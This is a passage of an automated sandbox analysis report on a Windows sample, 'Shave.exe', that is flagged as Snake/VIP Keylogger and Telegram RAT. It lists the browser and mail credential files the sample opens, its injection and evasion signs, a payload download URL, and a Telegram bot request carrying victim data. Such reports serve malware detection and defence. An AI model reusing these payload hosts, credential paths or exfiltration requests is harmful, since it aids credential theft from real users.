Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_6F971B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6F971B63
Enables debug privileges
Source: C:\Users\user\Desktop\Shave.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Shave.exe Process created: C:\Users\user\Desktop\Shave.exe "C:\Users\user\Desktop\Shave.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Users\user\Desktop\Shave.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\Shave.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Shave.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Shave.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: Shave.exe PID: 7044, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562047 Sample: Shave.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 17 reallyfreegeoip.org 2->17 19 api.telegram.org 2->19 21 4 other IPs or domains 2->21 29 Found malware configuration 2->29 31 Multi AV Scanner detection for submitted file 2->31 33 Yara detected VIP Keylogger 2->33 39 5 other signatures 2->39 7 Shave.exe 2 26 2->7         started        signatures3 35 Tries to detect the country of the analysis system (by using the IP) 17->35 37 Uses the Telegram API (likely for C&C communication) 19->37 process4 file5 15 C:\Users\user\AppData\Local\...\System.dll, PE32 7->15 dropped 41 Tries to detect virtualization through RDTSC time measurements 7->41 43 Switches to a custom stack to bypass stack traces 7->43 11 Shave.exe 15 8 7->11         started        signatures6 process7 dnsIp8 23 mail.cipmach.com 199.79.63.24, 49886, 49898, 49913 PUBLIC-DOMAIN-REGISTRYUS United States 11->23 25 api.telegram.org 149.154.167.220, 443, 49865 TELEGRAMRU United Kingdom 11->25 27 3 other IPs or domains 11->27 45 Tries to steal Mail credentials (via file / registry access) 11->45 47 Tries to harvest and steal browser information (history, passwords, etc) 11->47 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
185.244.144.68
 mertvinc.com.tr Turkey
199608 BIRBIRTR false
199.79.63.24
 mail.cipmach.com United States
394695 PUBLIC-DOMAIN-REGISTRYUS true
193.122.130.0
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
172.67.177.134
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
mertvinc.com.tr 185.244.144.68 true
reallyfreegeoip.org 172.67.177.134 true
mail.cipmach.com 199.79.63.24 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.130.0 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.75 false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:899552%0D%0ADate%20and%20Time:%2026/11/2024%20/%2019:05:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20899552%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
        		high